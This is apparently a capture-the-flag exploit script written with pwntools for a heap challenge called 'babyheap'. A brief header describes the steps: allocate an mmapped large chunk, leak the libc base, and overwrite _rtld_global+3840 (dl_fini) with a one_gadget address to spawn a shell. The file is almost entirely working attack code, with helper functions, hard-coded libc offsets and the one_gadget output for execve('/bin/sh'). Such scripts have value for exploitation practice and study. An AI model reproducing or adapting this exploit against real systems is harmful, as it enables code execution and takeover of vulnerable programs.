malloc an mmapped large chunk
leak libc, then overwrite _rtld_global + 3840 (dl_fini)
shell
from pwn import *
#context.log_level= 'debug'
e = ELF('babyheap')
#s = process(e.path, env={'LD_PRELOAD': './libc.so.6'})
s = process(e.path)
l = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
#l = ELF('libc.so.6', checksec=False)


def ru(x):
    """Receive from the target tube until ``x`` has been seen."""
    return s.recvuntil(x)


def sl(x):
    """Send ``x`` followed by a newline."""
    return s.sendline(x)


def p():
    """Block until the operator continues (pwntools ``pause``)."""
    return pause()


def io():
    """Hand the tube over to the terminal for manual interaction."""
    return s.interactive()


def sla(x, y):
    """Wait for ``x`` on the tube, then send ``y`` plus a newline."""
    return s.sendlineafter(x, y)


def sa(x, y):
    """Wait for ``x`` on the tube, then send ``y`` exactly as given."""
    return s.sendafter(x, y)
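def malloc(size, data):
    """Drive menu option 1 (allocate) on the target.

    Args:
        size: requested allocation size. An ``int`` is converted with
            ``str()``; a ``str``/``bytes`` value is sent unchanged, which is
            what the existing ``malloc(str(...), ...)`` callers rely on.
        data: contents written into the new chunk. Sent with ``sendafter``,
            so no trailing newline is appended.
    """
    # The menu prompts with '> ' three times: choice, size, then contents.
    sla('> ', '1')
    sla('> ', str(size) if isinstance(size, int) else size)
    sa('> ', data)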
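def free(idx):
    """Drive menu option 2 (free) on the target.

    Args:
        idx: value answered to the second prompt. An ``int`` is converted
            with ``str()``; a ``str``/``bytes`` value is sent unchanged, which
            is what the existing ``free(str(...))`` callers rely on.
    """
    # Two '> ' prompts: menu choice, then the index to free.
    sla('> ', '2')
    sla('> ', str(idx) if isinstance(idx, int) else idx)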
# Stage 1 (header note: "malloc mmaped large chunk"): two large requests
# interleaved with frees.  The free() arguments look like offsets rather than
# small table indices -- NOTE(review): depends on how the binary indexes its
# chunks; confirm against the target.
malloc(str(0x30000), p64(0x20))
free(str(0x4bfa0))
malloc(str(0x30000), p64(0x20))
free(str(0x7cfa0))
# Stage 2 (header note: "leak libc"): a small allocation whose only data byte
# is 0x60; the script then reads 8 bytes from the tube, interprets them as a
# little-endian qword and subtracts a constant to obtain the libc base.
# 0x619f60 is presumably the offset of the leaked pointer inside this
# particular libc build -- verify it against the libc actually loaded.
malloc(str(0x30), '\x60')
l_base = u64(s.recv(8)) - 0x619f60
log.info('l_base: {}'.format(hex(l_base)))
# Reference output kept from one_gadget; `dump` is not used at runtime.  The
# three addresses it lists are the values copied into `one_list` below.
dump = '''
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rcx == NULL
0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
one_list = [0x4f2c5, 0x4f322, 0x10a38c]
# The second listed offset is the one used here.
one = l_base + one_list[1]
# Stage 3: two 0x38-byte allocations whose contents are the computed address.
# The header note says this is meant to reach _rtld_global + 3840 (dl_fini);
# that cannot be verified from this script alone.
malloc(str(0x38), p64(one))
malloc(str(0x38), p64(one))
io()